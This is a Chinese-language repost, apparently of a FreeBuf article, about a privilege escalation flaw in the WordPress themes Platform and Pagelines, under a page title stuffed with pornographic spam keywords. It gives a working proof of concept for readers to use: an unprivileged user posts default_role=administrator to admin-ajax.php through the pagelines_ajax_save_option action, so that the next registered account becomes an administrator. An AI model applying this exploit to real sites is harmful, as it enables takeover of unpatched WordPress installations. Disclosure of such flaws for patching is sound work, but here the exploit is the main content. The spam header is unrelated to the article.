亚洲日本免费-啊轻点灬太粗太长了三男一女-麻豆av电影在线观看-日韩一级片毛片|www.grbbt.com

知名WordPress主題Pagelines和Platform權(quán)限提升漏洞POC

在FreeBuf看到wordpress主題又爆漏洞了,此主題使用量還是很多的……現(xiàn)在你們要的POC來了。

漏洞簡介

某個WordPress網(wǎng)站如果使用了Platform主題(版本號小于1.4.4),黑客就可以輕易取得該網(wǎng)站的權(quán)限。

黑客可以利用惡意軟件、SEO垃圾郵件以及其他方式,執(zhí)行PHP代碼來感染你的網(wǎng)站。在使用了主題Pagelines(版本號小于1.4.6)的WordPress網(wǎng)站中,黑客只要注冊一個賬號,就可以使用權(quán)限提升exp進行攻擊。提升權(quán)限后黑客可以做許多事,包括使用WordPress主題文件編輯器。 更多漏洞說明

主題版本Platform1.4.3

漏洞說明只給了一張圖,不過已經(jīng)說得很詳細了。我只是寫個過程。

20150312045230628

wp_ajax_pagelines_ajax_save_option和pagelines_ajax_save_option_callback是在一起的。

so,我們只要找到wp_ajax_pagelines_ajax_save_option就好了。

20150312045252708

文件:/wp-admin/admin-ajax.php

所以只要是wp_ajax鉤子都可以調(diào)用,哪怕是訂閱者權(quán)限。

一共一句話還要exp么?

POC(概念驗證程序)

http://localhost//wp-admin/admin-ajax.php?action=pagelines_ajax_save_option

post:default_role=administrator

先注冊一個號,然后提交。什么也不顯示也對了。然后再注冊一個號,就是管理員了。

關(guān)于第二代碼執(zhí)行,好像必須得管理員權(quán)限。

文章來源:freeBuf.com

上一篇:小漏洞大影響:來看看希爾頓酒店官網(wǎng)的CSRF漏洞

下一篇:谷歌正為Gmail開發(fā)PGP端到端加密技術(shù)